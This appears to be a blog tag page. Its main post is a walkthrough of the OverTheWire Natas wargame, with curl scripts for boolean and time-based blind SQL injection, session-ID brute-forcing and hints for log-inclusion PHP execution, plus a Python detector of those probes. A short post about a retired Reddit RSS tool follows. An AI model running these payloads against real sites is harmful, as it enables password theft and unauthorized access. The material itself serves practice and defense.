Tag Archives: php

Collection of Natas

Natas 15
Try each candidate character until the password prefix matches

# $pw holds the natas15 password (HTTP auth); $k accumulates the natas16
# password recovered so far. Re-run (or wrap in an outer loop) to extend $k
# one character per pass.
k=''
for v in {{a..z},{A..Z},{0..9}}; do
  curl -u "natas15:$pw" 'http://natas15.natas.labs.overthewire.org/index.php' \
    --data 'username=natas16%22+and+password+COLLATE+latin1_general_cs+LIKE%22'"$k$v"'%25' \
    --compressed > out 2>/dev/null
  # "This user exists" is only returned when the case-sensitive LIKE prefix matched
  if [ "$(grep -c 'user exists' out)" -gt 0 ]; then
    k=$k$v; echo "$k"; break
  fi
done

Natas 18
Capture the password by introducing a 10-second sleep whenever the guessed prefix is correct

#timeout.sh contains:
#!/bin/sh
# Run the remaining arguments, killing them with SIGALRM after the given number
# of seconds (the alarm set in perl survives the exec).
perl -e 'alarm shift; exec @ARGV' "$@"


Test the duration of the curl command

# $pw holds the natas17 password (HTTP auth for the level being attacked);
# $k accumulates the natas18 password, one character per outer iteration.
k=''
for z in {0..33}; do
  w=0
  for v in {{a..z},{A..Z},{0..9}}; do
    # a non-zero status means the 2-second alarm killed curl, i.e. the injected
    # SLEEP(10) ran because the prefix $k$v matched
    ./timeout.sh 2 curl -u "natas17:$pw" 'http://natas17.natas.labs.overthewire.org/index.php' \
      --data 'username=natas18%22+AND+IF+%28+password+COLLATE+latin1_general_cs+LIKE+%22'"$k$v"'%25%22%2C+SLEEP%2810%29%2C+%22NO%22%29+%23' \
      --compressed > out 2>/dev/null
    if [ $? -ne 0 ]; then
      k=$k$v; echo "$k"; w=1; break
    fi
  done
  # no character extended the prefix: the full password has been found
  if [ $w -eq 0 ]; then break; fi
done
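
As an added defender-side example (not part of the original write-up), the Python below scans application request logs for the ingredients of the probes used in the Natas 15 and 18 scripts above (a quote that breaks out of the string, a case-sensitive COLLATE, a LIKE with a trailing wildcard, a SLEEP() delay, a trailing comment) and flags clients whose LIKE prefixes grow from one request to the next. The log lines and the `<client> <method> <path> <raw body>` format are constructed for the example; the assumption is that the application logs raw POST bodies.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed request log, one "<client> <method> <path> <raw POST body>" line each; assumption: the app logs bodies.
SAMPLE_LOG = """\
10.0.0.5 POST /index.php username=natas16%22+and+password+COLLATE+latin1_general_cs+LIKE%22a%25
10.0.0.5 POST /index.php username=natas16%22+and+password+COLLATE+latin1_general_cs+LIKE%22b%25
10.0.0.5 POST /index.php username=natas16%22+and+password+COLLATE+latin1_general_cs+LIKE%22bW%25
10.0.0.9 POST /index.php username=natas18%22+AND+IF+%28+password+COLLATE+latin1_general_cs+LIKE+%22x%25%22%2C+SLEEP%2810%29%2C+%22NO%22%29+%23
10.0.0.7 POST /index.php username=alice
"""

# One regex per ingredient of the probes above, applied to the URL-decoded parameter value.
SIGNATURES = {
    "quote_break":       re.compile(r'["\']\s*(?:and|or)\b', re.I),      # natas16" and ...
    "like_prefix_probe": re.compile(r'\bLIKE\s*["\'][^"\']*%', re.I),     # LIKE "bW%
    "cs_collation":      re.compile(r'\bCOLLATE\s+\w+_cs\b', re.I),       # case-sensitive compare
    "time_delay":        re.compile(r'\b(?:SLEEP|BENCHMARK)\s*\(', re.I), # time-based oracle
    "comment_tail":      re.compile(r'(?:#|--\s*)\s*$'),                  # rest of query commented out
}
LIKE_PREFIX = re.compile(r'\bLIKE\s*["\']([^"\'%]*)%', re.I)  # the guessed prefix itself

def scan_line(line):
    """Return (client, field, decoded value, matched signature names), or None if clean."""
    parts = line.split(" ", 3)
    if len(parts) < 4:  # malformed line: not in the assumed four-field form
        return None
    client, _method, _path, body = parts
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
            if hits:
                return client, field, value, hits
    return None

def scan_log(text, min_probes=2):
    """Per-line findings, plus clients whose LIKE prefixes grow request by request (extraction fingerprint)."""
    findings, prefixes = [], defaultdict(list)
    for line in text.splitlines():
        hit = scan_line(line)
        if hit is None:
            continue
        client, field, value, names = hit
        findings.append({"client": client, "field": field, "signatures": names})
        if m := LIKE_PREFIX.search(value):
            prefixes[client].append(m.group(1))
    extracting = {c for c, ps in prefixes.items() if len(ps) >= min_probes
                  and any(b.startswith(a) and len(b) > len(a) for a in ps for b in ps)}
    return findings, extracting
```

Run against real traffic this would be a feed for alerting on the source client, not a blocking rule; the prefix-growth check is what separates a one-off probe from an extraction in progress.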

Natas 19
Search for the session ID that produces different page output

# $pw holds the natas18 password; the session IDs are small integers, so try them all
for k in {0..640}; do
  curl -u "natas18:$pw" 'http://natas18.natas.labs.overthewire.org/index.php' \
    -H "Cookie: PHPSESSID=$k" --compressed > out 2>/dev/null
  # the admin session is the one whose page does not say "regular user"
  if [ "$(grep -c regular out)" -eq 0 ]; then
    echo "$k"; break
  fi
done

Natas 20
Brute-force the session ID after capturing ~500 new sessions (with username=admin) to determine the common cookie elements: it starts with 3 and ends with 2d61646d696e.

# $pw holds the natas19 password; the cookie is built as "3" + k + "2d61646d696e",
# the fixed parts observed in the captured sessions
for k in {0..64000}; do
  curl -u "natas19:$pw" 'http://natas19.natas.labs.overthewire.org/index.php?debug=1' \
    -H "Cookie: PHPSESSID=3${k}2d61646d696e" --compressed > out 2>/dev/null
  # neither "regular" nor the username prompt appears when the session is admin
  if [ "$(grep -Ec 'regular|username' out)" -eq 0 ]; then
    echo "found: $k"; break
  fi
  # progress marker every 100 attempts
  if [ $((k % 100)) -eq 0 ]; then echo "$k"; fi
done

Other Hints

21 – Add %0A to trick the session write
22 – Simply change the form to send admin=1, then use the session ID on the other site
23 – Ignore the redirect (and get the full web page via curl)
24 – Break strcmp (make it fail)
25 – Get our PHP code written into the *.log file, then have index.php 'include' the PHP commands embedded in the log file.

Reddit RSS Tool

No longer maintained and disabled


Just wrote an RSS tool for Reddit.

Currently, if you request an RSS feed from Reddit, all the feed links point to the Reddit comments page. This is not ideal when the subject of the post is (for example) an image: there is no need to go through the Reddit comments first and then click again to reach the image.

This tool lets you link to the image itself directly from the RSS feed.

To try it out, click here (hosted on this website).


I had a few considerations in mind, and since this idea spawned from mobile device usage, two things came to the fore:

  • Ease of Use
  • Bandwidth conservation

By eliminating the 2-step process